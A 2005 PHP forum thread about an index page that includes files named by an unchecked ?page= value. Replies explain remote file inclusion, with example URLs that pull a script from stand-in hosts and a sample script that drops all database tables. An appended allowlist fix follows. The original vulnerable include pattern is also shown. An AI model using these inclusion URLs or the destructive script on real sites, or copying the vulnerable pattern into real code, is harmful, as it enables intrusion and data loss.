Is this a good idea?


mscreashuns
07-02-2005, 03:04 PM
Here is the code for the index page of my chat site:

<html>
<head>
<meta name="keywords" content="chat, Sims, Sims 2, Sims 2 movies, movies, Sims99, ms510, ms creashuns, mastersimmer510, mastersimmer">
<meta name="description" content="The MS Creashuns Chat Room is a place for Sims 2 fans can come and chat with people with a common interest.">
<title>MS Creashuns Chat Room</title>
<link rel="stylesheet" type="text/css" href="chat.css">
</head>
<body>
<table width=100% border=0 cellspacing=0 cellpadding=0>
<tr><td class="all" background="#990000">
<table class="all" style="background:transparent;" align=center cellspacing=0 cellpadding=0>
<tr>
<td><h1>MS Creashuns Chat Room</h1></td>
<td align=right><img src="images/logo.gif" ALT="MS Creashuns Chat Room" width=115 height=115></td></tr></table></td></tr>
<tr><td><table border=0 style="background:transparent;" align=center cellspacing=0 cellpadding=0 width=100%><br></table></td></tr>
<tr width=50%><td>
<table class="all" style="background:transparent;" align=center cellspacing=0 cellpadding=0>
<tr>
<td class="all1" valign=top>
<p><font size=4>NAVIGATE</font><br><br>
<a href="index.php" title="Home">Home</a><br>
<a href="index.php?page=rules" title="General Rules">Rules</a><br>
<a href="index.php?page=faq" title="FAQ">FAQ</a><br>
<a href="chat/" title="Go Chat">Enter the Chat</a></p></td><td class="all2" valign=top>
<?
if ($page == "") {
include("announcements.txt"); } else {
include("$page.txt"); }
?>
<hr noshade color=white width=75%></td></tr>
</table></td></tr>
</table>
</body>
</html>

I know most of it isn't even PHP, but the part that is, is that a good idea? Basically what it does is uses the GET method to choose what text is displayed in the body of the page. If you want to see the actual thing, go here (http://mscreashuns.savefile.com/chat). If you click the links to the left, you will see that the main content changes, but the URL is not much different, it just adds "?page=(page_name)" to the end. Is this a good idea, or not? I know I could use includes to make everything but the content the same on each page, but this way I never have to modify this page, just the individual text files. Thanks! :D

halojoy
07-02-2005, 05:47 PM
:)

I can see no wrong with this.
And a visit to your website, shows it is working just fine!

There are certainly more complicated ways to make a navigate menu.
Methods so advanced, just to think of them, makes you sick.
Shockwave flashes, that not everybody can see, because have not latest plugin.
And so it goes. you know what I mean .....

I, for speaking my own personal opinion, like your simple way very much :)

As long as something works great with small efforts,
there is no need for any change.

/halojoy
:cool:

mscreashuns
07-02-2005, 05:59 PM
Yeah, I'm not finished with the Navigation, just questioning the technique for displaying the main content. The design is just sort of temporary. :D

halojoy
07-02-2005, 06:12 PM
Yeah, I'm not finished with the Navigation,
just questioning the technique for displaying the main content.
The design is just sort of temporary. :D

How did you read my post?? :confused:
Maybe English is not your mother tongue ...
Speak about misinterpreting and misunderstanding.

Okay, mate.
You better read my post, once again
What is okay, is okay.
What is not okay, maybe we can work to change.
Put in work to change what is already good?

Life is too short, for wasting your hours.
Isn't it?
Or are you too young to understand this fact.
Well, everybody's lifetimes are running.
Sooner or later, they will have to understand.
Or die.

:confused:

mscreashuns
07-02-2005, 07:22 PM
I understood your post just fine. I was just saying that I am going to change the navigation. I know it works fine, that was my intent, but I want something that looks better. Thank you for your input. ;)

Weedpacket
07-02-2005, 10:51 PM
Well, assuming $page is coming from a form, it means you're assuming register_globals is turned on, which is a poor idea in itself. Apart from that, it's fine, if you want visitors to be able to request any file on your entire system that has a name ending with ".txt".

phpn00bf4life
07-04-2005, 02:39 AM
If register globals is on it can be a huggggeee security risk, except it seems like not too much, because txt files can not do too much, but... just be careful :D

phpn00bf4life
07-04-2005, 02:43 AM
I use this in my template class:


function Content( $do ) {
    // NOTE: $area and $folder are not defined in this excerpt.
    if ( !isset( $do ) || $do == "" ) {
        // Nothing requested: fall back to the home module
        $do = "./modules/home/";
        $this->content = include( $do );
        return $this->content;
    } elseif ( !preg_match( '/^[-_a-z0-9]+$/i', $area ) && $area != "" ) { // Only allow a-z, 0-9, -, _ :)
        // Let's stop them
        $error = openerrortable( "1" );
        return $error;
        // Close if( !preg_match("") ...
    } elseif ( file_exists( "./" . $folder . "/" . $area . ".incphp" ) ) {
        // Check if the file exists
        $this->content = include( "./modules/" . $do . "/" );
        return $this->content;
        // Close elseif( file_ex ...
    } else {
        $error = openerrortable( "2" );
        return $error;
    }
} // Close function Content

Now I use that in a class system, and I'm opening different things, but that is a security measure to take... :)

mscreashuns
07-04-2005, 01:11 PM
Well, I can assure you that there is no security risk, as those are the only text files I have. ;)

phpn00bf4life
07-04-2005, 02:33 PM
bro taking extra security precautions is always a good idea.... :|

LoganK
07-14-2005, 05:13 PM
Actually, register_globals is a huge security risk, as well as your method of displaying them. Case in point, what if someone at www.virus-makers.com had a PHP virus named "virus.txt"? And they typed in index.php?page=http://www.virus-makers.com/virus.txt - even though it's a text file, the PHP inside will be processed by the PHP engine.

planetsim
07-14-2005, 09:34 PM
Well, I can assure you that there is no security risk, as those are the only text files I have. ;)

That doesn't mean anything. It could have anything with the extension of .txt; for all we know it could be anything like a binary or a malicious script coming through, as shown previously. Firstly, you should validate that the file actually exists on your server. Use $_GET, as at the moment I could post the data, have a cookie or anything, and that would still work with this page. $_GET comes from the query string, so if it's not there it doesn't get dealt with. At the moment it can come from anywhere, a big reason why register_globals is now Off by default.

suepahfly
07-16-2005, 10:37 PM
Suppose urlfopen is on (it is on, on most hosts)
Suppose register_globals is on
Suppose I enter the URL http://www.yourwebsite.tld/yourfile.php?page=http://myhost.tld/evilscript.txt

And suppose textfile.txt looks like this


<?PHP
$result = mysqlquery("SHOW TABLES");
while(list($table = mysql_fech_row($result))
{
mysql_query("DROP TABLE " . $table);
}

/* or some code that deletes files on disk */
?>

Just suppose..

This scenario is very plausible imo

Weedpacket
07-16-2005, 11:27 PM
Meanwhile, those .txt files may be the only ones on your server now, but will you remember to go back and fix your code in the future if there are ever any others?
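
Added example, not part of any post in this thread: one way to replace the `include("$page.txt")` block so that it addresses the points raised above (read from `$_GET` only, accept only known page names, confirm the file exists, and never execute the file's contents). The `pages` directory and the `rules.txt` / `faq.txt` file names are assumptions based on the links in the first post.

```php
<?php
// Assumption: the content .txt files live in a "pages" directory next to
// this script, and nothing else is stored there.
const PAGES_DIR = __DIR__ . '/pages';

// Allowlist mapping the ?page= value to a fixed file name.
// The request value is only ever used as a lookup key, never as a path.
const PAGES = [
    ''      => 'announcements.txt',   // default when no page is requested
    'rules' => 'rules.txt',           // assumed file name
    'faq'   => 'faq.txt',             // assumed file name
];

// Returns the full path for the requested page, or null if it is not allowed.
function resolve_page(array $query): ?string
{
    // Take the value from the query string only, so it cannot arrive via
    // POST data or a cookie as it can with register_globals.
    $page = $query['page'] ?? '';

    // Rejects arrays (?page[]=x), URLs, "../" paths and unknown names alike.
    if (!is_string($page) || !array_key_exists($page, PAGES)) {
        return null;
    }

    $path = PAGES_DIR . '/' . PAGES[$page];
    return is_file($path) ? $path : null;
}

function render_page(array $query): void
{
    $path = resolve_page($query);
    if ($path === null) {
        http_response_code(404);
        echo 'Page not found.';
        return;
    }
    // readfile() outputs the bytes as-is. Unlike include, it does not run
    // any <?php ... ?> code that ends up inside a .txt file.
    readfile($path);
}

render_page($_GET);
```

Adding a page then means dropping a new text file into `pages` and adding one line to `PAGES`.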